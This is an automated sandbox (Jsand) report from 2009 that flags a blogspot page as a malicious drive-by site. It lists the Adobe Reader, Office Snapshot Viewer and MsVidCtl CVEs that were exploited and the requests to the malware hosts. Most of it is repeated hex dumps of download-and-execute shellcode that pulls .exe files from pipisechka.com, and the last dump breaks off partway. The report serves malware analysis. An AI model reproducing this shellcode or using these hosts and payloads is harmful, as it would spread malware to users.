Analysis report for http://bertilladingman36429.blogspot.com/

Sample Overview

URLhttp://bertilladingman36429.blogspot.com/
MD5d55aea59cd61215efb5782772322b59d
Analysis Started2009-10-09 12:04:39
Report Generated2009-10-09 12:04:53
Jsand version1.03.02

See the report for domain bertilladingman36429.blogspot.com.

Detection results

DetectorResult
Jsand 1.03.02malicious

Exploits

NameDescriptionReference
Office Snapshot ViewerThe Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machineCVE-2008-2463
Adobe Collab overflowMultiple Adobe Reader and Acrobat buffer overflowsCVE-2007-5659
Adobe util.printf overflowStack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printfCVE-2008-2992
Adobe getIconStack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab objectCVE-2009-0927
MsVidCtl OverflowOverflow in Microsoft Video ActiveX Control via specially-crafted data parameterCVE-2008-0015

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URLStatusContent Type
http://bertilladingman36429.blogspot.com/200text/html
about:blank200text/html
http://afsharteam1.com/win/file2.htm200text/html
http://pipisechka.com/sleep/news.php?s=fb71a5433b200text/html
http://pipisechka.com/sleep/bgrx.pdf200application/pdf
http://afsharteam1.com/win/setup.exe200application/x-msdos-program

Redirects

No redirects.

ActiveX controls

Shellcode and Malware

HexadecimalASCII
e9 eb 01 00 00 56 64 a1  30 00 00 00 8b 40 0c 8b 
70 1c ad 8b 40 08 5e c3  55 8b ec 8b 45 08 52 33 
d2 c1 c2 03 32 10 40 80  38 00 75 f5 8b c2 5a 5d 
c2 04 00 55 8b ec 51 51  53 56 57 60 8b 5d 08 33 
c0 8b 75 0c 8b fe 03 76  3c 8b 4e 78 03 cf 8b 51 
1c 52 8b 51 24 52 8b 71  14 4e 89 75 fc 8b 71 20 
03 f7 99 4a ad 42 60 3b  55 fc 75 04 33 c0 eb 37 
33 ff 03 45 0c 97 8b cf  ae 75 fd 2b f9 4f 51 e8 
94 ff ff ff 3b c3 61 74  02 eb d9 8b 45 0c 92 5e 
03 f2 d1 e0 03 c6 33 c9  0f b7 08 5f c1 e1 02 03 
ca 03 cf 8b 01 03 c2 89  45 f8 61 8b 45 f8 5f 5e 
5b c9 c3 55 8b ec 51 e8  49 ff ff ff 50 68 e8 60 
bf 04 e8 6c ff ff ff 33  d2 52 52 ff 75 08 ff d0 
89 45 fc 8b 45 fc c9 c3  55 8b ec 83 ec 0c 8d 45 
f4 50 c6 45 f4 75 c6 45  f5 72 c6 45 f6 6c c6 45 
f7 6d c6 45 f8 6f c6 45  f9 6e c6 45 fa 2e c6 45 
fb 64 c6 45 fc 6c c6 45  fd 6c c6 45 fe 00 e8 a0 
ff ff ff 50 68 5d 8a 11  16 e8 15 ff ff ff 83 c4 
0c 85 c0 74 15 6a 00 6a  00 ff 75 0c ff 75 08 6a 
00 ff d0 85 c0 75 03 40  c9 c3 33 c0 c9 c3 57 33 
c0 8b 4c 24 0c 8b 7c 24  08 fc f3 aa 5f c3 8b 4c 
24 04 80 39 00 8b c1 74  06 40 80 38 00 75 fa 2b 
c1 c3 55 8b ec 83 ec 64  53 8d 45 f0 57 33 db 50 
c6 45 f0 6b c6 45 f1 65  c6 45 f2 72 c6 45 f3 6e 
c6 45 f4 65 c6 45 f5 6c  c6 45 f6 33 c6 45 f7 32 
c6 45 f8 2e c6 45 f9 64  c6 45 fa 6c c6 45 fb 6c 
88 5d fc e8 0b ff ff ff  50 68 68 43 f9 8e e8 80 
fe ff ff 8b f8 8d 45 9c  6a 44 50 e8 7e ff ff ff 
8d 45 e0 6a 10 50 e8 73  ff ff ff 83 c4 1c 8d 45 
e0 50 8d 45 9c 50 53 53  53 53 53 53 ff 75 08 c7 
45 9c 44 00 00 00 53 ff  d7 5f 0f b6 c0 5b c9 c3 
55 8b ec 51 51 53 56 57  6a 42 e8 72 00 00 00 8b 
d8 33 f6 85 db 59 c7 45  f8 61 2e 65 78 c7 45 fc 
65 00 00 00 7e 56 8d 45  f8 50 56 e8 51 00 00 00 
59 50 e8 b1 fe ff ff 85  c0 59 59 74 39 8d 46 01 
50 e8 3b 00 00 00 8b f8  8d 45 f8 50 e8 21 ff ff 
ff 85 c0 59 59 74 0c 57  e8 01 ff ff ff 59 c6 44 
38 ff 73 50 8d 45 f8 fe  00 58 8d 45 f8 50 57 e8 
74 fe ff ff 59 59 46 46  3b f3 7c aa 5f 5e 5b c9 
c3 55 8b ec 51 53 66 60  b1 32 e8 00 00 00 00 58 
38 08 74 03 40 eb f9 40  8b 5d 08 80 fb 42 75 08 
33 db 8a 18 8b c3 eb 17  38 18 76 11 40 33 c9 84 
db 74 0c 40 38 08 75 fb  40 fe cb eb f2 33 c0 89 
45 fc 8b 45 fc 5b c9 c3  32 02 68 74 74 70 3a 2f 
2f 70 69 70 69 73 65 63  68 6b 61 2e 63 6f 6d 2f 
73 6c 65 65 70 2f 73 64  67 73 67 35 2e 65 78 65 
00 68 74 74 70 3a 2f 2f  70 69 70 69 73 65 63 68 
6b 61 2e 63 6f 6d 2f 73  6c 65 65 70 2f 63 6c 69 
63 6b 2e 70 68 70 3f 72  3d 00 
.....Vd.0....@..
p...@.^.U...E.R3
....2.@.8.u...Z]
...U..QQSVW`.].3
..u....v<.Nx...Q
.R.Q$R.q.N.u..q 
...J.B`;U.u.3..7
3..E.....u.+.OQ.
....;.at....E..^
......3...._....
........E.a.E._^
[..U..Q.I...Ph.`
...l...3.RR.u...
.E..E...U......E
.P.E.u.E.r.E.l.E
.m.E.o.E.n.E...E
.d.E.l.E.l.E....
...Ph]..........
...t.j.j..u..u.j
.....u.@..3...W3
..L$..|$...._..L
$..9...t.@.8.u.+
..U....dS.E.W3.P
.E.k.E.e.E.r.E.n
.E.e.E.l.E.3.E.2
.E...E.d.E.l.E.l
.]......PhhC....
......E.jDP.~...
.E.j.P.s.......E
.P.E.PSSSSSS.u..
E.D...S.._...[..
U..QQSVWjB.r....
.3...Y.E.a.ex.E.
e...~V.E.PV.Q...
YP.......YYt9.F.
P.;......E.P.!..
...YYt.W.....Y.D
8.sP.E...X.E.PW.
t...YYFF;.|._^[.
.U..QSf`.2.....X
8.t.@..@.]...Bu.
3.......8.v.@3..
.t.@8.u.@....3..
E..E.[..2.http:/
/pipisechka.com/
sleep/sdgsg5.exe
.http://pipisech
ka.com/sleep/cli
ck.php?r=.
e9 eb 01 00 00 56 64 a1  30 00 00 00 8b 40 0c 8b 
70 1c ad 8b 40 08 5e c3  55 8b ec 8b 45 08 52 33 
d2 c1 c2 03 32 10 40 80  38 00 75 f5 8b c2 5a 5d 
c2 04 00 55 8b ec 51 51  53 56 57 60 8b 5d 08 33 
c0 8b 75 0c 8b fe 03 76  3c 8b 4e 78 03 cf 8b 51 
1c 52 8b 51 24 52 8b 71  14 4e 89 75 fc 8b 71 20 
03 f7 99 4a ad 42 60 3b  55 fc 75 04 33 c0 eb 37 
33 ff 03 45 0c 97 8b cf  ae 75 fd 2b f9 4f 51 e8 
94 ff ff ff 3b c3 61 74  02 eb d9 8b 45 0c 92 5e 
03 f2 d1 e0 03 c6 33 c9  0f b7 08 5f c1 e1 02 03 
ca 03 cf 8b 01 03 c2 89  45 f8 61 8b 45 f8 5f 5e 
5b c9 c3 55 8b ec 51 e8  49 ff ff ff 50 68 e8 60 
bf 04 e8 6c ff ff ff 33  d2 52 52 ff 75 08 ff d0 
89 45 fc 8b 45 fc c9 c3  55 8b ec 83 ec 0c 8d 45 
f4 50 c6 45 f4 75 c6 45  f5 72 c6 45 f6 6c c6 45 
f7 6d c6 45 f8 6f c6 45  f9 6e c6 45 fa 2e c6 45 
fb 64 c6 45 fc 6c c6 45  fd 6c c6 45 fe 00 e8 a0 
ff ff ff 50 68 5d 8a 11  16 e8 15 ff ff ff 83 c4 
0c 85 c0 74 15 6a 00 6a  00 ff 75 0c ff 75 08 6a 
00 ff d0 85 c0 75 03 40  c9 c3 33 c0 c9 c3 57 33 
c0 8b 4c 24 0c 8b 7c 24  08 fc f3 aa 5f c3 8b 4c 
24 04 80 39 00 8b c1 74  06 40 80 38 00 75 fa 2b 
c1 c3 55 8b ec 83 ec 64  53 8d 45 f0 57 33 db 50 
c6 45 f0 6b c6 45 f1 65  c6 45 f2 72 c6 45 f3 6e 
c6 45 f4 65 c6 45 f5 6c  c6 45 f6 33 c6 45 f7 32 
c6 45 f8 2e c6 45 f9 64  c6 45 fa 6c c6 45 fb 6c 
88 5d fc e8 0b ff ff ff  50 68 68 43 f9 8e e8 80 
fe ff ff 8b f8 8d 45 9c  6a 44 50 e8 7e ff ff ff 
8d 45 e0 6a 10 50 e8 73  ff ff ff 83 c4 1c 8d 45 
e0 50 8d 45 9c 50 53 53  53 53 53 53 ff 75 08 c7 
45 9c 44 00 00 00 53 ff  d7 5f 0f b6 c0 5b c9 c3 
55 8b ec 51 51 53 56 57  6a 42 e8 72 00 00 00 8b 
d8 33 f6 85 db 59 c7 45  f8 61 2e 65 78 c7 45 fc 
65 00 00 00 7e 56 8d 45  f8 50 56 e8 51 00 00 00 
59 50 e8 b1 fe ff ff 85  c0 59 59 74 39 8d 46 01 
50 e8 3b 00 00 00 8b f8  8d 45 f8 50 e8 21 ff ff 
ff 85 c0 59 59 74 0c 57  e8 01 ff ff ff 59 c6 44 
38 ff 73 50 8d 45 f8 fe  00 58 8d 45 f8 50 57 e8 
74 fe ff ff 59 59 46 46  3b f3 7c aa 5f 5e 5b c9 
c3 55 8b ec 51 53 66 60  b1 32 e8 00 00 00 00 58 
38 08 74 03 40 eb f9 40  8b 5d 08 80 fb 42 75 08 
33 db 8a 18 8b c3 eb 17  38 18 76 11 40 33 c9 84 
db 74 0c 40 38 08 75 fb  40 fe cb eb f2 33 c0 89 
45 fc 8b 45 fc 5b c9 c3  32 02 68 74 74 70 3a 2f 
2f 70 69 70 69 73 65 63  68 6b 61 2e 63 6f 6d 2f 
73 6c 65 65 70 2f 66 70  74 76 32 2e 65 78 65 00 
68 74 74 70 3a 2f 2f 70  69 70 69 73 65 63 68 6b 
61 2e 63 6f 6d 2f 73 6c  65 65 70 2f 63 6c 69 63 
6b 2e 70 68 70 3f 72 3d  00 00 
.....Vd.0....@..
p...@.^.U...E.R3
....2.@.8.u...Z]
...U..QQSVW`.].3
..u....v<.Nx...Q
.R.Q$R.q.N.u..q 
...J.B`;U.u.3..7
3..E.....u.+.OQ.
....;.at....E..^
......3...._....
........E.a.E._^
[..U..Q.I...Ph.`
...l...3.RR.u...
.E..E...U......E
.P.E.u.E.r.E.l.E
.m.E.o.E.n.E...E
.d.E.l.E.l.E....
...Ph]..........
...t.j.j..u..u.j
.....u.@..3...W3
..L$..|$...._..L
$..9...t.@.8.u.+
..U....dS.E.W3.P
.E.k.E.e.E.r.E.n
.E.e.E.l.E.3.E.2
.E...E.d.E.l.E.l
.]......PhhC....
......E.jDP.~...
.E.j.P.s.......E
.P.E.PSSSSSS.u..
E.D...S.._...[..
U..QQSVWjB.r....
.3...Y.E.a.ex.E.
e...~V.E.PV.Q...
YP.......YYt9.F.
P.;......E.P.!..
...YYt.W.....Y.D
8.sP.E...X.E.PW.
t...YYFF;.|._^[.
.U..QSf`.2.....X
8.t.@..@.]...Bu.
3.......8.v.@3..
.t.@8.u.@....3..
E..E.[..2.http:/
/pipisechka.com/
sleep/fptv2.exe.
http://pipisechk
a.com/sleep/clic
k.php?r=..
e9 eb 01 00 00 56 64 a1  30 00 00 00 8b 40 0c 8b 
70 1c ad 8b 40 08 5e c3  55 8b ec 8b 45 08 52 33 
d2 c1 c2 03 32 10 40 80  38 00 75 f5 8b c2 5a 5d 
c2 04 00 55 8b ec 51 51  53 56 57 60 8b 5d 08 33 
c0 8b 75 0c 8b fe 03 76  3c 8b 4e 78 03 cf 8b 51 
1c 52 8b 51 24 52 8b 71  14 4e 89 75 fc 8b 71 20 
03 f7 99 4a ad 42 60 3b  55 fc 75 04 33 c0 eb 37 
33 ff 03 45 0c 97 8b cf  ae 75 fd 2b f9 4f 51 e8 
94 ff ff ff 3b c3 61 74  02 eb d9 8b 45 0c 92 5e 
03 f2 d1 e0 03 c6 33 c9  0f b7 08 5f c1 e1 02 03 
ca 03 cf 8b 01 03 c2 89  45 f8 61 8b 45 f8 5f 5e 
5b c9 c3 55 8b ec 51 e8  49 ff ff ff 50 68 e8 60 
bf 04 e8 6c ff ff ff 33  d2 52 52 ff 75 08 ff d0 
89 45 fc 8b 45 fc c9 c3  55 8b ec 83 ec 0c 8d 45 
f4 50 c6 45 f4 75 c6 45  f5 72 c6 45 f6 6c c6 45 
f7 6d c6 45 f8 6f c6 45  f9 6e c6 45 fa 2e c6 45 
fb 64 c6 45 fc 6c c6 45  fd 6c c6 45 fe 00 e8 a0 
ff ff ff 50 68 5d 8a 11  16 e8 15 ff ff ff 83 c4 
0c 85 c0 74 15 6a 00 6a  00 ff 75 0c ff 75 08 6a 
00 ff d0 85 c0 75 03 40  c9 c3 33 c0 c9 c3 57 33 
c0 8b 4c 24 0c 8b 7c 24  08 fc f3 aa 5f c3 8b 4c 
24 04 80 39 00 8b c1 74  06 40 80 38 00 75 fa 2b 
c1 c3 55 8b ec 83 ec 64  53 8d 45 f0 57 33 db 50 
c6 45 f0 6b c6 45 f1 65  c6 45 f2 72 c6 45 f3 6e 
c6 45 f4 65 c6 45 f5 6c  c6 45 f6 33 c6 45 f7 32 
c6 45 f8 2e c6 45 f9 64  c6 45 fa 6c c6 45 fb 6c 
88 5d fc e8 0b ff ff ff  50 68 68 43 f9 8e e8 80 
fe ff ff 8b f8 8d 45 9c  6a 44 50 e8 7e ff ff ff 
8d 45 e0 6a 10 50 e8 73  ff ff ff 83 c4 1c 8d 45 
e0 50 8d 45 9c 50 53 53  53 53 53 53 ff 75 08 c7 
45 9c 44 00 00 00 53 ff  d7 5f 0f b6 c0 5b c9 c3 
55 8b ec 51 51 53 56 57  6a 42 e8 72 00 00 00 8b 
d8 33 f6 85 db 59 c7 45  f8 61 2e 65 78 c7 45 fc 
65 00 00 00 7e 56 8d 45  f8 50 56 e8 51 00 00 00 
59 50 e8 b1 fe ff ff 85  c0 59 59 74 39 8d 46 01 
50 e8 3b 00 00 00 8b f8  8d 45 f8 50 e8 21 ff ff 
ff 85 c0 59 59 74 0c 57  e8 01 ff ff ff 59 c6 44 
38 ff 73 50 8d 45 f8 fe  00 58 8d 45 f8 50 57 e8 
74 fe ff ff 59 59 46 46  3b f3 7c aa 5f 5e 5b c9 
c3 55 8b ec 51 53 66 60  b1 32 e8 00 00 00 00 58 
38 08 74 03 40 eb f9 40  8b 5d 08 80 fb 42 75 08 
33 db 8a 18 8b c3 eb 17  38 18 76 11 40 33 c9 84 
db 74 0c 40 38 08 75 fb  40 fe cb eb f2 33 c0 89 
45 fc 8b 45 fc 5b c9 c3  32 02 68 74 74 70 3a 2f 
2f 70 69 70 69 73 65 63  68 6b 61 2e 63 6f 6d 2f 
73 6c 65 65 70 2f 67 6e  62 69 7a 32 2e 65 78 65 
00 68 74 74 70 3a 2f 2f  70 69 70 69 73 65 63 68 
6b 61 2e 63 6f 6d 2f 73  6c 65 65 70 2f 63 6c 69 
63 6b 2e 70 68 70 3f 72  3d 00 
.....Vd.0....@..
p...@.^.U...E.R3
....2.@.8.u...Z]
...U..QQSVW`.].3
..u....v<.Nx...Q
.R.Q$R.q.N.u..q 
...J.B`;U.u.3..7
3..E.....u.+.OQ.
....;.at....E..^
......3...._....
........E.a.E._^
[..U..Q.I...Ph.`
...l...3.RR.u...
.E..E...U......E
.P.E.u.E.r.E.l.E
.m.E.o.E.n.E...E
.d.E.l.E.l.E....
...Ph]..........
...t.j.j..u..u.j
.....u.@..3...W3
..L$..|$...._..L
$..9...t.@.8.u.+
..U....dS.E.W3.P
.E.k.E.e.E.r.E.n
.E.e.E.l.E.3.E.2
.E...E.d.E.l.E.l
.]......PhhC....
......E.jDP.~...
.E.j.P.s.......E
.P.E.PSSSSSS.u..
E.D...S.._...[..
U..QQSVWjB.r....
.3...Y.E.a.ex.E.
e...~V.E.PV.Q...
YP.......YYt9.F.
P.;......E.P.!..
...YYt.W.....Y.D
8.sP.E...X.E.PW.
t...YYFF;.|._^[.
.U..QSf`.2.....X
8.t.@..@.]...Bu.
3.......8.v.@3..
.t.@8.u.@....3..
E..E.[..2.http:/
/pipisechka.com/
sleep/gnbiz2.exe
.http://pipisech
ka.com/sleep/cli
ck.php?r=.
e9 eb 01 00 00 56 64 a1  30 00 00 00 8b 40 0c 8b 
70 1c ad 8b 40 08 5e c3  55 8b ec 8b 45 08 52 33 
d2 c1 c2 03 32 10 40 80  38 00 75 f5 8b c2 5a 5d 
c2 04 00 55 8b ec 51 51  53 56 57 60 8b 5d 08 33 
c0 8b 75 0c 8b fe 03 76  3c 8b 4e 78 03 cf 8b 51 
1c 52 8b 51 24 52 8b 71  14 4e 89 75 fc 8b 71 20 
03 f7 99 4a ad 42 60 3b  55 fc 75 04 33 c0 eb 37 
33 ff 03 45 0c 97 8b cf  ae 75 fd 2b f9 4f 51 e8 
94 ff ff ff 3b c3 61 74  02 eb d9 8b 45 0c 92 5e 
03 f2 d1 e0 03 c6 33 c9  0f b7 08 5f c1 e1 02 03 
ca 03 cf 8b 01 03 c2 89  45 f8 61 8b 45 f8 5f 5e 
5b c9 c3 55 8b ec 51 e8  49 ff ff ff 50 68 e8 60 
bf 04 e8 6c ff ff ff 33  d2 52 52 ff 75 08 ff d0 
89 45 fc 8b 45 fc c9 c3  55 8b ec 83 ec 0c 8d 45 
f4 50 c6 45 f4 75 c6 45  f5 72 c6 45 f6 6c c6 45 
f7 6d c6 45 f8 6f c6 45  f9 6e c6 45 fa 2e c6 45 
fb 64 c6 45 fc 6c c6 45  fd 6c c6 45 fe 00 e8 a0 
ff ff ff 50 68 5d 8a 11  16 e8 15 ff ff ff 83 c4 
0c 85 c0 74 15 6a 00 6a  00 ff 75 0c ff 75 08 6a 
00 ff d0 85 c0 75 03 40  c9 c3 33 c0 c9 c3 57 33 
c0 8b 4c 24 0c 8b 7c 24  08 fc f3 aa 5f c3 8b 4c 
24 04 80 39 00 8b c1 74  06 40 80 38 00 75 fa 2b 
c1 c3 55 8b ec 83 ec 64  53 8d 45 f0 57 33 db 50 
c6 45 f0 6b c6 45 f1 65  c6 45 f2 72 c6 45 f3 6e 
c6 45 f4 65 c6 45 f5 6c  c6 45 f6 33 c6 45 f7 32 
c6 45 f8 2e c6 45 f9 64  c6 45 fa 6c c6 45 fb 6c 
88 5d fc e8 0b ff ff ff  50 68 68 43 f9 8e e8 80 
fe ff ff 8b f8 8d 45 9c  6a 44 50 e8 7e ff ff ff 
8d 45 e0 6a 10 50 e8 73  ff ff ff 83 c4 1c 8d 45 
e0 50 8d 45 9c 50 53 53  53 53 53 53 ff 75 08 c7 
45 9c 44 00 00 00 53 ff  d7 5f 0f b6 c0 5b c9 c3 
55 8b ec 51 51 53 56 57  6a 42 e8 72 00 00 00 8b 
d8 33 f6 85 db 59 c7 45  f8 61 2e 65 78 c7 45 fc 
65 00 00 00 7e 56 8d 45  f8 50 56 e8 51 00 00 00 
59 50 e8 b1 fe ff ff 85  c0 59 59 74 39 8d 46 01 
50 e8 3b 00 00 00 8b f8  8d 45 f8 50 e8 21 ff ff 
ff 85 c0 59 59 74 0c 57  e8 01 ff ff ff 59 c6 44 
38 ff 73 50 8d 45 f8 fe  00 58 8d 45 f8 50 57 e8 
74 fe ff ff 59 59 46 46  3b f3 7c aa 5f 5e 5b c9 
c3 55 8b ec 51 53 66 60  b1 32 e8 00 00 00 00 58 
38 08 74 03 40 eb f9 40  8b 5d 08 80 fb 42 75 08 
33 db 8a 18 8b c3 eb 17  38 18 76 11 40 33 c9 84 
db 74 0c 40 38 08 75 fb  40 fe cb eb f2 33 c0 89 
45 fc 8b 45 fc 5b c9 c3  32 02 68 74 74 70 3a 2f 
2f 70 69 70 69 73 65 63  68 6b 61 2e 63 6f 6d 2f 
73 6c 65 65 70 2f 61 63  6e 74 79 32 2e 65 78 65 
00 68 74 74 70 3a 2f 2f  70 69 70 69 73 65 63 68 
6b 61 2e 63 6f 6d 2f 73  6c 65 65 70 2f 63 6c 69 
63 6b 2e 70 68 70 3f 72  3d 00 
.....Vd.0....@..
p...@.^.U...E.R3
....2.@.8.u...Z]
...U..QQSVW`.].3
..u....v<.Nx...Q
.R.Q$R.q.N.u..q 
...J.B`;U.u.3..7
3..E.....u.+.OQ.
....;.at....E..^
......3...._....
........E.a.E._^
[..U..Q.I...Ph.`
...l...3.RR.u...
.E..E...U......E
.P.E.u.E.r.E.l.E
.m.E.o.E.n.E...E
.d.E.l.E.l.E....
...Ph]..........
...t.j.j..u..u.j
.....u.@..3...W3
..L$..|$...._..L
$..9...t.@.8.u.+
..U....dS.E.W3.P
.E.k.E.e.E.r.E.n
.E.e.E.l.E.3.E.2
.E...E.d.E.l.E.l
.]......PhhC....
......E.jDP.~...
.E.j.P.s.......E
.P.E.PSSSSSS.u..
E.D...S.._...[..
U..QQSVWjB.r....
.3...Y.E.a.ex.E.
e...~V.E.PV.Q...
YP.......YYt9.F.
P.;......E.P.!..
...YYt.W.....Y.D
8.sP.E...X.E.PW.
t...YYFF;.|._^[.
.U..QSf`.2.....X
8.t.@..@.]...Bu.
3.......8.v.@3..
.t.@8.u.@....3..
E..E.[..2.http:/
/pipisechka.com/
sleep/acnty2.exe
.http://pipisech
ka.com/sleep/cli
ck.php?r=.
e9 eb 01 00 00 56 64 a1  30 00 00 00 8b 40 0c 8b 
70 1c ad 8b 40 08 5e c3  55 8b ec 8b 45 08 52 33 
d2 c1 c2 03 32 10 40 80  38 00 75 f5 8b c2 5a 5d 
c2 04 00 55 8b ec 51 51  53 56 57 60 8b 5d 08 33 
c0 8b 75 0c 8b fe 03 76  3c 8b 4e 78 03 cf 8b 51 
1c 52 8b 51 24 52 8b 71  14 4e 89 75 fc 8b 71 20 
03 f7 99 4a ad 42 60 3b  55 fc 75 04 33 c0 eb 37 
33 ff 03 45 0c 97 8b cf  ae 75 fd 2b f9 4f 51 e8 
94 ff ff ff 3b c3 61 74  02 eb d9 8b 45 0c 92 5e 
03 f2 d1 e0 03 c6 33 c9  0f b7 08 5f c1 e1 02 03 
ca 03 cf 8b 01 03 c2 89  45 f8 61 8b 45 f8 5f 5e 
5b c9 c3 55 8b ec 51 e8  49 ff ff ff 50 68 e8 60 
bf 04 e8 6c ff ff ff 33  d2 52 52 ff 75 08 ff d0 
89 45 fc 8b 45 fc c9 c3  55 8b ec 83 ec 0c 8d 45 
f4 50 c6 45 f4 75 c6 45  f5 72 c6 45 f6 6c c6 45 
f7 6d c6 45 f8 6f c6 45  f9 6e c6 45 fa 2e c6 45 
fb 64 c6 45 fc 6c c6 45  fd 6c c6 45 fe 00 e8 a0 
ff ff ff 50 68 5d 8a 11  16 e8 15 ff ff ff 83 c4 
0c 85 c0 74 15 6a 00 6a  00 ff 75 0c ff 75 08 6a 
00 ff d0 85 c0 75 03 40  c9 c3 33 c0 c9 c3 57 33 
c0 8b 4c 24 0c 8b 7c 24  08 fc f3 aa 5f c3 8b 4c 
24 04 80 39 00 8b c1 74  06 40 80 38 00 75 fa 2b 
c1 c3 55 8b ec 83 ec 64  53 8d 45 f0 57 33 db 50 
c6 45 f0 6b c6 45 f1 65  c6 45 f2 72 c6 45 f3 6e 
c6 45 f4 65 c6 45 f5 6c  c6 45 f6 33 c6 45 f7 32 
c6 45 f8 2e c6 45 f9 64  c6 45 fa 6c c6 45 fb 6c 
88 5d fc e8 0b ff ff ff  50 68 68 43 f9 8e e8 80 
fe ff ff 8b f8 8d 45 9c  6a 44 50 e8 7e ff ff ff 
8d 45 e0 6a 10 50 e8 73  ff ff ff 83 c4 1c 8d 45 
e0 50 8d 45 9c 50 53 53  53 53 53 53 ff 75 08 c7 
45 9c 44 00 00 00 53 ff  d7 5f 0f b6 c0 5b c9 c3 
55 8b ec 51 51 53 56 57  6a 42 e8 72 00 00 00 8b 
d8 33 f6 85 db 59 c7 45  f8 61 2e 65 78 c7 45 fc 
65 00 00 00 7e 56 8d 45  f8 50 56 e8 51 00 00 00 
59 50 e8 b1 fe ff ff 85  c0 59 59 74 39 8d 46 01 
50 e8 3b 00 00 00 8b f8  8d 45 f8 50 e8 21 ff ff 
ff 85 c0 59 59 74 0c 57  e8 01 ff ff ff 59 c6 44 
38 ff 73 50 8d 45 f8 fe  00 58 8d 45 f8 50 57 e8 
74 fe ff ff 59 59 46 46  3b f3 7c aa 5f 5e 5b c9 
c3 55 8b ec 51 53 66 60  b1 32 e8 00 00 00 00 58 
38 08 74 03 40 eb f9 40  8b 5d 08 80 fb 42 75 08 
33 db 8a 18 8b c3 eb 17  38 18 76 11 40 33 c9 84 
db 74 0c 40 38 08 75 fb  40 fe cb eb f2 33 c0 89 
45 fc 8b 45 fc 5b c9 c3  32 02 68 74 74 70 3a 2f 
2f 70 69 70 69 73 65 63  68 6b 61 2e 63 6f 6d 2f 
73 6c 65 65 70 2f 67 68  69 6d 71 73 32 2e 65 78 
65 00 68 74 74 70 3a 2f  2f 70 69 70 69 73 65 63 
68 6b 61 2e 63 6f 6d 2f  73 6c 65 65 70 2f 63 6c 
69 63 6b 2e 70 68 70 3f  72 3d 00 00 
.....Vd.0....@..
p...@.^.U...E.R3
....2.@.8.u...Z]
...U..QQSVW`.].3
..u....v<.Nx...Q
.R.Q$R.q.N.u..q 
...J.B`;U.u.3..7
3..E.....u.+.OQ.
....;.at....E..^
......3...._....
........E.a.E._^
[..U..Q.I...Ph.`
...l...3.RR.u...
.E..E...U......E
.P.E.u.E.r.E.l.E
.m.E.o.E.n.E...E
.d.E.l.E.l.E....
...Ph]..........
...t.j.j..u..u.j
.....u.@..3...W3
..L$..|$...._..L
$..9...t.@.8.u.+
..U....dS.E.W3.P
.E.k.E.e.E.r.E.n
.E.e.E.l.E.3.E.2
.E...E.d.E.l.E.l
.]......PhhC....
......E.jDP.~...
.E.j.P.s.......E
.P.E.PSSSSSS.u..
E.D...S.._...[..
U..QQSVWjB.r....
.3...Y.E.a.ex.E.
e...~V.E.PV.Q...
YP.......YYt9.F.
P.;......E.P.!..
...YYt.W.....Y.D
8.sP.E...X.E.PW.
t...YYFF;.|._^[.
.U..QSf`.2.....X
8.t.@..@.]...Bu.
3.......8.v.@3..
.t.@8.u.@....3..
E..E.[..2.http:/
/pipisechka.com/
sleep/ghimqs2.ex
e.http://pipisec
hka.com/sleep/cl
ick.php?r=..
0a 0a 0a 0a 0a 0a 0a 0a  e9 eb 01 00 00 56 64 a1 
30 00 00 00 8b 40 0c 8b  70 1c ad 8b 40 08 5e c3 
55 8b ec 8b 45 08 52 33  d2 c1 c2 03 32 10 40 80 
38 00 75 f5 8b c2 5a 5d  c2 04 00 55 8b ec 51 51 
53 56 57 60 8b 5d 08 33  c0 8b 75 0c 8b fe 03 76 
3c 8b 4e 78 03 cf 8b 51  1c 52 8b 51 24 52 8b 71 
14 4e 89 75 fc 8b 71 20  03 f7 99 4a ad 42 60 3b 
55 fc 75 04 33 c0 eb 37  33 ff 03 45 0c 97 8b cf 
ae 75 fd 2b f9 4f 51 e8  94 ff ff ff 3b c3 61 74 
02 eb d9 8b 45 0c 92 5e  03 f2 d1 e0 03 c6 33 c9 
0f b7 08 5f c1 e1 02 03  ca 03 cf 8b 01 03 c2 89 
45 f8 61 8b 45 f8 5f 5e  5b c9 c3 55 8b ec 51 e8 
49 ff ff ff 50 68 e8 60  bf 04 e8 6c ff ff ff 33 
d2 52 52 ff 75 08 ff d0  89 45 fc 8b 45 fc c9 c3 
55 8b ec 83 ec 0c 8d 45  f4 50 c6 45 f4 75 c6 45 
f5 72 c6 45 f6 6c c6 45  f7 6d c6 45 f8 6f c6 45 
f9 6e c6 45 fa 2e c6 45  fb 64 c6 45 fc 6c c6 45 
fd 6c c6 45 fe 00 e8 a0  ff ff ff 50 68 5d 8a 11 
16 e8 15 ff ff ff 83 c4  0c 85 c0 74 15 6a 00 6a 
00 ff 75 0c ff 75 08 6a  00 ff d0 85 c0 75 03 40 
c9 c3 33 c0 c9 c3 57 33  c0 8b 4c 24 0c 8b 7c 24 
08 fc f3 aa 5f c3 8b 4c  24 04 80 39 00 8b c1 74 
06 40 80 38 00 75 fa 2b  c1 c3 55 8b ec 83 ec 64 
53 8d 45 f0 57 33 db 50  c6 45 f0 6b c6 45 f1 65 
c6 45 f2 72 c6 45 f3 6e  c6 45 f4 65 c6 45 f5 6c 
c6 45 f6 33 c6 45 f7 32  c6 45 f8 2e c6 45 f9 64 
c6 45 fa 6c c6 45 fb 6c  88 5d fc e8 0b ff ff ff 
50 68 68 43 f9 8e e8 80  fe ff ff 8b f8 8d 45 9c 
6a 44 50 e8 7e ff ff ff  8d 45 e0 6a 10 50 e8 73 
ff ff ff 83 c4 1c 8d 45  e0 50 8d 45 9c 50 53 53 
53 53 53 53 ff 75 08 c7  45 9c 44 00 00 00 53 ff 
d7 5f 0f b6 c0 5b c9 c3  55 8b ec 51 51 53 56 57 
6a 42 e8 72 00 00 00 8b  d8 33 f6 85 db 59 c7 45 
f8 61 2e 65 78 c7 45 fc  65 00 00 00 7e 56 8d 45 
f8 50 56 e8 51 00 00 00  59 50 e8 b1 fe ff ff 85 
c0 59 59 74 39 8d 46 01  50 e8 3b 00 00 00 8b f8 
8d 45 f8 50 e8 21 ff ff  ff 85 c0 59 59 74 0c 57 
e8 01 ff ff ff 59 c6 44  38 ff 73 50 8d 45 f8 fe 
00 58 8d 45 f8 50 57 e8  74 fe ff ff 59 59 46 46 
3b f3 7c aa 5f 5e 5b c9  c3 55 8b ec 51 53 66 60 
b1 32 e8 00 00 00 00 58  38 08 74 03 40 eb f9 40 
